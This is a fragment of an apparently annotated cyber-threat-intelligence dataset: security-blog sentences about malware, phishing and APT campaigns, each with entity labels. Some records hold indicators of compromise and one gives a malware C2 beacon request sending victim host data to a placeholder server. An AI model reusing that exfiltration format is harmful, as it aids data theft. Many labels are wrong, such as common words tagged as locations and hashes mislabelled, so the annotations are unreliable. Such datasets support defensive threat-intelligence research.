all malware families are created equal.","entities":[],"relations":[],"Comments":[]} +{"id":1229,"text":"This separation of functions may be intended to avoid detection by security products.","entities":[],"relations":[],"Comments":[]} +{"id":10152,"text":"In the week of the 2017 presidential elections in Iran, Pawn Storm set up a phishing site targeting chmail.ir webmail users.","entities":[{"id":30971,"label":"attack-pattern","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} +{"id":4703,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50590,"label":"identity","start_offset":4,"end_offset":25},{"id":50591,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} +{"id":2062,"text":"A further account, l4cky-control, was also discovered.","entities":[{"id":47154,"label":"identity","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} +{"id":10068,"text":"We also noticed the presence of an APK file hosted in one of the servers, suggesting that if the cybercriminals decide to go further than just infecting servers, they may decide to attack Android-based devices.","entities":[{"id":30709,"label":"identity","start_offset":138,"end_offset":142},{"id":30710,"label":"location","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} +{"id":8660,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":10557,"text":"We\u2019ve also seen attackers try to trick people into downloading malware by impersonating health organizations: Generally, we\u2019re not seeing an overall rise in phishing attacks by government-backed groups; this is just a change in tactics.","entities":[{"id":32188,"label":"location","start_offset":141,"end_offset":148},{"id":32189,"label":"attack-pattern","start_offset":157,"end_offset":165},{"id":32190,"label":"identity","start_offset":211,"end_offset":215}],"relations":[],"Comments":[]} +{"id":1600,"text":"Based on the reviews, the application does not function very well as a remote, but in reality it doesn\u2019t contain remote control capability.","entities":[],"relations":[],"Comments":[]} +{"id":9728,"text":" Enterprises can benefit from Trend Micro\u2019s Smart Protection Suites with XGen\u2122 security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint. Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f Tags Malware | APT & Targeted Attacks | Endpoints | Research | Network","entities":[{"id":29662,"label":"location","start_offset":13,"end_offset":16},{"id":29666,"label":"location","start_offset":79,"end_offset":87},{"id":29667,"label":"location","start_offset":108,"end_offset":116},{"id":29668,"label":"location","start_offset":157,"end_offset":167},{"id":29669,"label":"location","start_offset":192,"end_offset":200},{"id":29670,"label":"location","start_offset":231,"end_offset":234},{"id":29671,"label":"SHA2","start_offset":414,"end_offset":478},{"id":29672,"label":"tools","start_offset":488,"end_offset":504},{"id":29673,"label":"SHA1","start_offset":507,"end_offset":571},{"id":29674,"label":"tools","start_offset":582,"end_offset":598},{"id":29675,"label":"SHA1","start_offset":601,"end_offset":665},{"id":29676,"label":"location","start_offset":693,"end_offset":696}],"relations":[],"Comments":[]} +{"id":8823,"text":"In the threat actor toolkit, different types of attacks are used for different purposes: Phishing campaigns can be used like a scalpel\u2014targeting specific groups or individuals with personalized lures that are more likely to trick them into taking action (like clicking on a malware link), while DDoS attacks are more like a hatchet\u2014disrupting or blocking a site or a service entirely.","entities":[{"id":27325,"label":"location","start_offset":56,"end_offset":59},{"id":27326,"label":"attack-pattern","start_offset":89,"end_offset":97},{"id":27327,"label":"location","start_offset":108,"end_offset":111},{"id":27328,"label":"location","start_offset":205,"end_offset":208},{"id":27329,"label":"location","start_offset":214,"end_offset":220},{"id":27330,"label":"location","start_offset":230,"end_offset":234},{"id":27331,"label":"location","start_offset":247,"end_offset":253},{"id":27332,"label":"location","start_offset":308,"end_offset":311}],"relations":[],"Comments":[]} +{"id":11497,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[],"relations":[],"Comments":[]} +{"id":9407,"text":"Collection Data from Local System T1533 Used to collect files from the device, including documents, photos, and media files","entities":[{"id":28956,"label":"attack-pattern","start_offset":11,"end_offset":33},{"id":28957,"label":"location","start_offset":108,"end_offset":111},{"id":28958,"label":"location","start_offset":113,"end_offset":118}],"relations":[],"Comments":[]} +{"id":2365,"text":"For those interested in following our in-the-wild work, we will soon publish details surrounding another, unrelated campaign we discovered using two Chrome 0-days (CVE-2021-37973 and CVE-2021-37976).","entities":[{"id":47418,"label":"vulnerability","start_offset":183,"end_offset":197},{"id":47419,"label":"SOFTWARE","start_offset":149,"end_offset":155},{"id":47417,"label":"vulnerability","start_offset":164,"end_offset":178}],"relations":[{"id":319,"from_id":47419,"to_id":47417,"type":"has"},{"id":320,"from_id":47419,"to_id":47418,"type":"has"}],"Comments":[]} +{"id":1718,"text":"These many C2 mechanisms make Dyre much more difficult to fully take down than a simple single (or small group) of C2s.","entities":[{"id":46893,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} +{"id":316,"text":"If your administrators and help desk are the only ones who need RDP access to your systems, disable RDP for the rest of your users.","entities":[{"id":46013,"label":"SOFTWARE","start_offset":100,"end_offset":103},{"id":46012,"label":"SOFTWARE","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} +{"id":1510,"text":"This is an ELF file and there are various encrypted portions within it.","entities":[],"relations":[],"Comments":[]} +{"id":9795,"text":"Indicators of Compromise SHA256 Type Detection Name 41ee0ab77b474b0c84a1c25591029533f058e4454d9f83ba30159cc6309c65d1","entities":[{"id":29845,"label":"location","start_offset":33,"end_offset":37},{"id":29846,"label":"SHA2","start_offset":53,"end_offset":117}],"relations":[],"Comments":[]} +{"id":9583,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} +{"id":13590,"text":"Note that the PHP code below is obfuscated.","entities":[],"relations":[],"Comments":[]} +{"id":1646,"text":"Many of the users who downloaded the tool may not be using one of the targeted Spanish or Australian networks.","entities":[],"relations":[],"Comments":[]} +{"id":510,"text":"This demonstrates the diversity of ransomware and emphasizes how difficult it is to expand ransomware detection coverage with static profiling.","entities":[],"relations":[],"Comments":[]} +{"id":6803,"text":"If, however, these lines do not pass through this IF statement, an error would occur.","entities":[],"relations":[],"Comments":[]} +{"id":3826,"text":"Variable}.registry.HKCU Set HKEY_CURRENT_USER {Variable}.registry.HKLM Set HKEY_LOCAL_MACHINE {Variable}.registry.STRING Set String Value {Variable}.registry.BINARY Set Binary Value {Variable}.registry.DWORD Set DWORD Value {Variable}.registry.QWORD","entities":[],"relations":[],"Comments":[]} +{"id":14071,"text":"Figure 9 shows that SLUB used \u201cWindows-RT-KB-2937636.dll,\u201d while Freenki used \u201cWindows-KB275122-x86.exe.\u201d Figure 9 Naming convention for persistence.","entities":[{"id":47392,"label":"FILEPATH","start_offset":79,"end_offset":103},{"id":47389,"label":"FILEPATH","start_offset":31,"end_offset":56},{"id":47395,"label":"malware","start_offset":65,"end_offset":73},{"id":43549,"label":"malware","start_offset":20,"end_offset":24}],"relations":[{"id":316,"from_id":43549,"to_id":47389,"type":"uses"},{"id":317,"from_id":47395,"to_id":47392,"type":"uses"}],"Comments":[]} +{"id":7502,"text":"The configuration portion of the PowerShell script","entities":[{"id":23343,"label":"attack-pattern","start_offset":33,"end_offset":43}],"relations":[],"Comments":[]} +{"id":9306,"text":"Credit card CVN number cc_first_name ff First name of cardholder cc_last_name gg Last name of cardholder bill_to_phone hh Phone number for billing bill_to_country ii","entities":[],"relations":[],"Comments":[]} +{"id":8109,"text":" Figure 4. Two-stage payload deployment Figure 5. Code showing how the dropper invokes extra DEX code To deploy the payload app callCam on the device without the user\u2019s awareness","entities":[{"id":25125,"label":"malware","start_offset":129,"end_offset":136}],"relations":[],"Comments":[]} +{"id":13101,"text":"That resulted in our collaboration to develop secure network guidelines for industrial robots using ROS.","entities":[],"relations":[],"Comments":[]} +{"id":3376,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10222,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":4089,"text":"Furthermore, when Lilith RAT is terminated, it will try to clean itself to prevent being found by investigators.","entities":[{"id":49923,"label":"malware","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} +{"id":11313,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten\u2019s objectives.","entities":[{"id":34577,"label":"location","start_offset":5,"end_offset":9},{"id":34579,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} +{"id":3801,"text":"It also abuses three legitimate MS Office functions:","entities":[{"id":49673,"label":"SOFTWARE","start_offset":32,"end_offset":41}],"relations":[],"Comments":[]} +{"id":12088,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[],"relations":[],"Comments":[]} +{"id":14087,"text":"Even when the threat actor was not using the \u201cJSON\u201d format, the commands embedded in the various samples show a surprising amount of similarities.","entities":[],"relations":[],"Comments":[]} +{"id":11264,"text":"Collect files Collects the specified file from an endpoint during an investigation Submit a file for sandbox analysis Submits a file to the Trend Micro Vision One sandbox for automated analysis Retrieve sandbox analysis report Retrieves the analysis report, IOCs, or artifacts available after automated analysis Quarantine email message","entities":[],"relations":[],"Comments":[]} +{"id":7118,"text":"We provided a detailed analysis of this new HyperBro version in our research.","entities":[{"id":22273,"label":"malware","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} +{"id":1741,"text":"Attackers send emails that appear to be from a person or company that you trust.","entities":[],"relations":[],"Comments":[]} +{"id":8270,"text":"The payload was still njRAT.","entities":[{"id":25528,"label":"malware","start_offset":22,"end_offset":27}],"relations":[],"Comments":[]} +{"id":6525,"text":"\u0645\u06a9\u062a\u0628\u0629 \u0625\u0644\u06a9\u062a\u0631\u0648\u0646\u06cc\u0629.pdf 70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1b Trojan.","entities":[{"id":20233,"label":"SHA1","start_offset":20,"end_offset":84}],"relations":[],"Comments":[]} +{"id":3866,"text":" Figure 15. Koadic\u2019s communication traffic Medium- to long-term mitigation","entities":[{"id":49726,"label":"malware","start_offset":12,"end_offset":18}],"relations":[],"Comments":[]} +{"id":727,"text":"The open-source OMI package is designed to provide a portable infrastructure backbone for web-based management tools, such as diagnostic monitoring, log analytic services and automation functionality within UNIX and Linux systems.","entities":[{"id":46299,"label":"SOFTWARE","start_offset":207,"end_offset":211},{"id":46301,"label":"SOFTWARE","start_offset":16,"end_offset":27},{"id":46300,"label":"SOFTWARE","start_offset":216,"end_offset":221}],"relations":[],"Comments":[]} +{"id":4732,"text":"TAG also recently released information on a segment of attackers we call \u201chack-for-hire\u201d that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50640,"label":"attack-pattern","start_offset":74,"end_offset":87},{"id":50641,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50639,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":3229,"text":"The third scheduled task \u2014is called \u201cbig.txt\u201d\u2014 is responsible for implementing the BIOPASS RAT malware.","entities":[{"id":48350,"label":"FILEPATH","start_offset":37,"end_offset":44},{"id":9841,"label":"attack-pattern","start_offset":10,"end_offset":24},{"id":9842,"label":"malware","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} +{"id":3258,"text":"Encoded \u201cjoin\u201d event sent to the C&C server Figure 19.","entities":[],"relations":[],"Comments":[]} +{"id":6220,"text":"The email exfiltration flow with WebSocket backdoor Figure 14.","entities":[],"relations":[],"Comments":[]} +{"id":9097,"text":"Lurk compromised systems by exploiting web browser vulnerabilities via drive-by download attacks.","entities":[{"id":28092,"label":"malware","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} +{"id":14010,"text":"When determining attribution, the most interesting leads are the ones that can deduce information about the malware author\u2019s working environment.","entities":[],"relations":[],"Comments":[]} +{"id":12,"text":"If you re-test these hashes again from last week you can see an average of 49\/57 engines that detect last week\u2019s threat \u2013 but that\u2019s too little, too late for anyone who already lost data.","entities":[],"relations":[],"Comments":[]} +{"id":2018,"text":"There are also no magic bytes within the packed payload, unlike UPX-packed binaries, which contain the magic bytes UPX!.","entities":[{"id":47116,"label":"tools","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} +{"id":9800,"text":"Given their targets, we have named this campaign \u201cOperation ENDTRADE,\u201d and identified some of the findings in our research \u201cOperation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data\u201d.","entities":[{"id":29868,"label":"location","start_offset":0,"end_offset":5},{"id":29869,"label":"location","start_offset":40,"end_offset":48},{"id":29870,"label":"location","start_offset":71,"end_offset":74},{"id":29871,"label":"threat-actor","start_offset":144,"end_offset":148},{"id":29872,"label":"location","start_offset":198,"end_offset":201}],"relations":[],"Comments":[]} +{"id":2188,"text":"By doing this, they were able to target organizations that relied on the distributor\u2019s security camera solution and infect their systems with malware.","entities":[],"relations":[],"Comments":[]} +{"id":2181,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":5260,"text":"The apps mainly used Middle East-based news and sociopolitical themes as social engineering hooks and abused social media to further proliferate.","entities":[{"id":51300,"label":"attack-pattern","start_offset":73,"end_offset":91},{"id":51301,"label":"attack-pattern","start_offset":102,"end_offset":121}],"relations":[],"Comments":[]} +{"id":13834,"text":"In the end, it returns the modified table.","entities":[],"relations":[],"Comments":[]} +{"id":3855,"text":"It also downloads the following: Accevent.exe <-> Microsoft Accessible Event Watcher 7.2.0.0 event.dll <-> the loader of ssssss.ddd, (Detected as TROJ_ANELLDR) ssssss.ddd (lena_http.bin) <-> encrypted BKDR_ANEL (Detected as BKDR_ANELENC) ","entities":[{"id":49708,"label":"FILEPATH","start_offset":161,"end_offset":171},{"id":49711,"label":"malware","start_offset":225,"end_offset":237},{"id":49705,"label":"FILEPATH","start_offset":34,"end_offset":46},{"id":49706,"label":"FILEPATH","start_offset":94,"end_offset":103},{"id":49707,"label":"FILEPATH","start_offset":122,"end_offset":132},{"id":49709,"label":"FILEPATH","start_offset":173,"end_offset":186},{"id":49710,"label":"malware","start_offset":202,"end_offset":211},{"id":49712,"label":"malware","start_offset":147,"end_offset":159},{"id":49713,"label":"SOFTWARE","start_offset":51,"end_offset":93}],"relations":[],"Comments":[]} +{"id":12283,"text":"Host IOCs Registry Keys HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverConfig HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update File Paths C:\\Windows\\System32\\Nwsapagent.sys C:\\Windows\\System32\\helpsvc.sys C:\\ProgramData\\USOShared\\uso.bin C:\\ProgramData\\VMware\\vmnat-update.bin C:\\ProgramData\\VirtualBox\\update.bin","entities":[{"id":38092,"label":"location","start_offset":0,"end_offset":4},{"id":38093,"label":"REGISTRYKEY","start_offset":24,"end_offset":83},{"id":38094,"label":"REGISTRYKEY","start_offset":84,"end_offset":143},{"id":38095,"label":"REGISTRYKEY","start_offset":144,"end_offset":198}],"relations":[],"Comments":[]} +{"id":10222,"text":"The RATs were also sent to a wider net of targets including various industries around the world.","entities":[{"id":31229,"label":"malware","start_offset":35,"end_offset":38},{"id":31230,"label":"location","start_offset":90,"end_offset":95}],"relations":[],"Comments":[]} +{"id":10767,"text":"It provides a comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect threats like REDBALDKNIGHT\u2019s attacks even without any engine or pattern update.","entities":[{"id":32911,"label":"location","start_offset":95,"end_offset":98},{"id":32912,"label":"location","start_offset":164,"end_offset":167},{"id":32913,"label":"threat-actor","start_offset":260,"end_offset":273}],"relations":[],"Comments":[]} +{"id":4393,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} +{"id":4120,"text":"Opens command shell 0x5007 Unknown 0x5009 Closes command shell 0x500A","entities":[],"relations":[],"Comments":[]} +{"id":13935,"text":"Now they are digging deeper into their victims\u2019 networks and looking for new ways to monetize their activities.","entities":[],"relations":[],"Comments":[]} +{"id":10021,"text":"\u2014 TROJ_SIDELOADR.A 279cf1773903b7a5de63897d55268aa967a87f915a07924c574e42c9ed12de30 (sharphound.exe)","entities":[{"id":30594,"label":"MD5","start_offset":19,"end_offset":83}],"relations":[],"Comments":[]} +{"id":2461,"text":" Table 2. Top 15 source IPs triggering the Spring Core Remote Code Execution Vulnerability signature.","entities":[{"id":47532,"label":"vulnerability","start_offset":43,"end_offset":90}],"relations":[],"Comments":[]} +{"id":2770,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":2483,"text":"Both Netlab 360 and Trend Micro also observed Mirai activity related to the SpringShell vulnerability.","entities":[{"id":47561,"label":"identity","start_offset":5,"end_offset":15},{"id":47562,"label":"identity","start_offset":20,"end_offset":31},{"id":47563,"label":"malware","start_offset":46,"end_offset":51},{"id":47564,"label":"vulnerability","start_offset":76,"end_offset":101}],"relations":[],"Comments":[]} +{"id":1584,"text":"Reports indicate that it harvests credentials using Mimikatz and Maarten van Dantzig reports it also uses common hardcoded credentials to spread.","entities":[{"id":45067,"label":"tools","start_offset":52,"end_offset":60},{"id":45068,"label":"identity","start_offset":65,"end_offset":84},{"id":45069,"label":"attack-pattern","start_offset":25,"end_offset":45}],"relations":[{"id":76,"from_id":45069,"to_id":45067,"type":"uses"}],"Comments":[]} +{"id":6522,"text":"Password dumping tool out1.exe 79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6 HackTool.Win64.Lazagne.","entities":[{"id":20222,"label":"location","start_offset":17,"end_offset":21},{"id":20223,"label":"SHA1","start_offset":31,"end_offset":95}],"relations":[],"Comments":[]} +{"id":4416,"text":"The downloaded emails are not sent to the C2.","entities":[],"relations":[],"Comments":[]} +{"id":10137,"text":"The other says there is a new file on the company\u2019s OneDrive system.","entities":[],"relations":[],"Comments":[]} +{"id":3616,"text":"Spear Phishing is a specific attack technique that has become widely used in the past few years.","entities":[{"id":10910,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} +{"id":11986,"text":"We terminated 6 YouTube channels as part of our investigation into coordinated influence operations linked to Kyrgyzstan.","entities":[],"relations":[],"Comments":[]} +{"id":13997,"text":"We hope our thorough analysis of Operation Earth Kitsune will help others with data points for attribution in the future.","entities":[{"id":48784,"label":"campaign","start_offset":33,"end_offset":56}],"relations":[],"Comments":[]} +{"id":2485,"text":"A majority of these alerts are triggered by testing of the proof-of-concept tools previously mentioned above.","entities":[],"relations":[],"Comments":[]} +{"id":5752,"text":"IoT Company Wyze Leaks Emails, Device Data of 2.4M","entities":[],"relations":[],"Comments":[]} +{"id":5658,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole.","entities":[{"id":17421,"label":"tools","start_offset":48,"end_offset":54},{"id":17422,"label":"location","start_offset":55,"end_offset":58},{"id":17423,"label":"location","start_offset":59,"end_offset":67},{"id":17424,"label":"location","start_offset":84,"end_offset":87},{"id":17425,"label":"location","start_offset":121,"end_offset":130}],"relations":[],"Comments":[]} +{"id":9381,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":2925,"text":" The operation that Unit 42 has recently uncovered works to deliver XMRig, software that is used to mine the Monero cryptocurrency, to victims\u2019 systems without their knowledge or consent.","entities":[{"id":45744,"label":"identity","start_offset":20,"end_offset":27},{"id":45745,"label":"tools","start_offset":68,"end_offset":73},{"id":45746,"label":"SOFTWARE","start_offset":109,"end_offset":115}],"relations":[],"Comments":[]} +{"id":578,"text":"Lastly, we gave an example of ransom operations and updates about top ransomware families.","entities":[],"relations":[],"Comments":[]} +{"id":2624,"text":"the","entities":[],"relations":[],"Comments":[]} +{"id":2078,"text":" Additionally, this threat actor not only leverages open-source tooling, but also develops his own tools and scripts.","entities":[],"relations":[],"Comments":[]} +{"id":2545,"text":"Courses of Action for Conti ransomware.","entities":[{"id":7672,"label":"threat-actor","start_offset":22,"end_offset":27}],"relations":[],"Comments":[]} +{"id":10301,"text":"igmtSX.exe IMAP RAT","entities":[],"relations":[],"Comments":[]} +{"id":11534,"text":"These campaigns were similar regardless of target, consisting of a credential phishing email with a link to an attacker-controlled phishing page.","entities":[{"id":35327,"label":"location","start_offset":43,"end_offset":49},{"id":35328,"label":"attack-pattern","start_offset":78,"end_offset":86},{"id":35329,"label":"attack-pattern","start_offset":131,"end_offset":139},{"id":35330,"label":"location","start_offset":140,"end_offset":144}],"relations":[],"Comments":[]} +{"id":5085,"text":"Attacker-Owned Fake Job Domains: Exploitation URLs:","entities":[],"relations":[],"Comments":[]} +{"id":3558,"text":"Examining the Capesand samples The simplified diagram taken from the previous blog shows the combination of ConfuserEx and Cassandra via the second layer of obfuscation protection, which involves the DLL CyaX_Sharp Assembly (both CyaX_Sharp and CyaX are part of the Cassandra protector).","entities":[{"id":49341,"label":"malware","start_offset":14,"end_offset":22},{"id":49342,"label":"tools","start_offset":108,"end_offset":118},{"id":49343,"label":"tools","start_offset":123,"end_offset":132},{"id":49344,"label":"tools","start_offset":230,"end_offset":240},{"id":49345,"label":"tools","start_offset":245,"end_offset":249},{"id":49346,"label":"tools","start_offset":266,"end_offset":285}],"relations":[{"id":787,"from_id":49341,"to_id":49342,"type":"uses"},{"id":788,"from_id":49341,"to_id":49343,"type":"uses"}],"Comments":[]} +{"id":5057,"text":"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.","entities":[{"id":51162,"label":"identity","start_offset":142,"end_offset":167},{"id":51159,"label":"identity","start_offset":29,"end_offset":32},{"id":51160,"label":"threat-actor","start_offset":46,"end_offset":55},{"id":51161,"label":"identity","start_offset":101,"end_offset":127}],"relations":[{"id":1062,"from_id":51160,"to_id":51161,"type":"targets"},{"id":1063,"from_id":51160,"to_id":51162,"type":"targets"}],"Comments":[]} +{"id":1451,"text":"In addition, if the attacker can\u2019t create an app with the same name as the targeted app, he or she can still check the \u201cSharedUserId\u201d option.","entities":[],"relations":[],"Comments":[]} +{"id":1767,"text":"Although an attacker can use a variety of obfuscation techniques for HTML, we are still able to extract some features to create signatures.","entities":[],"relations":[],"Comments":[]} +{"id":13074,"text":"It\u2019s unclear how many of its 5 million user base were affected or how the breach happened.","entities":[],"relations":[],"Comments":[]} +{"id":12696,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":39406,"label":"location","start_offset":36,"end_offset":39},{"id":39410,"label":"malware","start_offset":179,"end_offset":187},{"id":39411,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} +{"id":8998,"text":"From one of the victims where we found an rshell sample, we also found a binary belonging to the Reptile rootkit framework, a rootkit identified as part of the arsenal of Earth Berberoka.","entities":[{"id":27805,"label":"location","start_offset":49,"end_offset":55},{"id":27806,"label":"malware","start_offset":97,"end_offset":104},{"id":27807,"label":"attack-pattern","start_offset":105,"end_offset":112},{"id":27808,"label":"attack-pattern","start_offset":126,"end_offset":133},{"id":27809,"label":"location","start_offset":160,"end_offset":167}],"relations":[],"Comments":[]} +{"id":13001,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} +{"id":4765,"text":"However administrators can also use advanced security settings to enhance their users\u2019 protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} +{"id":13927,"text":"There is no way to verify this statement, but we know that the group is still quite active.","entities":[],"relations":[],"Comments":[]} +{"id":13131,"text":"Even though platforms like the AWS Marketplace have streamlined the process of procurement immeasurably for cloud builders, friction persists.","entities":[{"id":48905,"label":"SOFTWARE","start_offset":31,"end_offset":46}],"relations":[],"Comments":[]} +{"id":657,"text":" Ransomware attacks are very common, but they are rarely coupled with an exploit that allows the malware to spread as a network worm.","entities":[],"relations":[],"Comments":[]} +{"id":1036,"text":"On August 27, we reported our findings to Taobao.","entities":[{"id":46529,"label":"TIME","start_offset":3,"end_offset":12},{"id":46530,"label":"SOFTWARE","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} +{"id":2022,"text":" The second packer we discovered consists of two layers, with the second being the custom UPX packer discussed above.","entities":[{"id":47119,"label":"tools","start_offset":90,"end_offset":100}],"relations":[],"Comments":[]} +{"id":1491,"text":"Unfortunately, many app developers in the Google Play Store have ignored these concerns in favor of convenience.","entities":[{"id":45027,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} +{"id":13609,"text":"The package of downloaded Flash installer ","entities":[],"relations":[],"Comments":[]} +{"id":4417,"text":"POST http:\/\/{C2}\/?Key={GUID}&Crc={Identifier} { \"appName\": \"Gmail Downloader\", \"targetname\": \"{Email}\", \"HostName\": \"REDACTED\", \"srcUserIP\": \"REDACTED\", \"actionType\": \"First\", \"timeOccurrence\": \"05\/01\/2022 05:50:31 PM\", \"OS\": \"REDACTED\", \"OSVersion\": \"REDACTED\", \"SystemModel\": \"REDACTED\", \"SystemType\": \"REDACTED\", \"srcName\": \"REDACTED\", \"srcOrgName\": \"REDACTED\" }","entities":[{"id":13209,"label":"URL","start_offset":5,"end_offset":44},{"id":13211,"label":"TIME","start_offset":206,"end_offset":217}],"relations":[],"Comments":[]} +{"id":1944,"text":" The documents can also be image files with the same theme, as can be seen here. Multiple Android applications further drive this notion, as they provide services based on the interests of users in that region.","entities":[],"relations":[],"Comments":[]} +{"id":4196,"text":"Masquerading: Match Legitimate Name or Location T1197 BITS Jobs T1070.006","entities":[{"id":50000,"label":"attack-pattern","start_offset":14,"end_offset":73}],"relations":[],"Comments":[]} +{"id":13869,"text":" The DarkSide ransomware DarkSide offers its RaaS to affiliates for a percentage of the profits.","entities":[],"relations":[],"Comments":[]} +{"id":2610,"text":"If Lapsus$ has purchased credentials for a network, they can effectively operate as an insider threat, taking advantage of the same privileges the employee has inside the network. Focus on general information security best practices: MFA, access controls and network segmentation.","entities":[{"id":47792,"label":"threat-actor","start_offset":3,"end_offset":10}],"relations":[],"Comments":[]} +{"id":6187,"text":" Figure 5. Malicious script appended on the victim\u2019s email signature Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":5336,"text":"The data follows a specific format.","entities":[],"relations":[],"Comments":[]} +{"id":5435,"text":"If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible.","entities":[{"id":51435,"label":"malware","start_offset":63,"end_offset":76}],"relations":[],"Comments":[]} +{"id":12878,"text":" Figure 4 - Workbench models showing correlated events ready for further investigation.","entities":[],"relations":[],"Comments":[]} +{"id":2916,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":1188,"text":"In-App Purchase (IAP) has become a popular way to sell services and virtual items through mobile applications.","entities":[],"relations":[],"Comments":[]} +{"id":5838,"text":"We don't need to [00:07:00] drop the pamphlets out of the plane anymore.","entities":[],"relations":[],"Comments":[]} +{"id":2119,"text":"According to both the Apache Foundation and security researcher Man Yue Mo, this vulnerability can enable remote code execution on a server running a vulnerable version of Apache Struts.","entities":[{"id":47257,"label":"identity","start_offset":22,"end_offset":39},{"id":47258,"label":"identity","start_offset":64,"end_offset":74},{"id":47259,"label":"attack-pattern","start_offset":106,"end_offset":127},{"id":47260,"label":"SOFTWARE","start_offset":172,"end_offset":185}],"relations":[],"Comments":[]} +{"id":9721,"text":"The figure below shows the example of two of several possible command codes.","entities":[],"relations":[],"Comments":[]} +{"id":4580,"text":"Last March it seemed the world came to a stand-still as the COVID-19 pandemic begin to rapidly spread.","entities":[{"id":50431,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} +{"id":5207,"text":"The network reflection and amplification vulnerability with bandwidth amplification factor (BAF) is calculated as the ratio between outbound and reflected traffic.","entities":[{"id":51256,"label":"vulnerability","start_offset":4,"end_offset":96}],"relations":[],"Comments":[]} +{"id":10877,"text":"June 13, 2021 596257ef017b02ba6961869d78a2317500a45f00c76682a22bbdbd3391857b5d upeg-system-app[.]com Likely repacked from Snaptube.","entities":[{"id":33116,"label":"SHA2","start_offset":15,"end_offset":79},{"id":33117,"label":"location","start_offset":104,"end_offset":110}],"relations":[],"Comments":[]} +{"id":10559,"text":"While it\u2019s not unusual to see some fluctuations in these numbers, it could be that attackers, just like many other organizations, are experiencing productivity lags and issues due to global lockdowns and quarantine efforts.","entities":[{"id":32196,"label":"identity","start_offset":94,"end_offset":98},{"id":32197,"label":"location","start_offset":104,"end_offset":108},{"id":32198,"label":"location","start_offset":130,"end_offset":133},{"id":32199,"label":"location","start_offset":165,"end_offset":168},{"id":32200,"label":"location","start_offset":200,"end_offset":203}],"relations":[],"Comments":[]} +{"id":3834,"text":"When sending the information, ANEL encrypts the data using blowfish, XOR, and Base64-based encryption methods.","entities":[{"id":11628,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} +{"id":10144,"text":"In one case we were able to warn the target within two hours after a dedicated credential phishing site was set 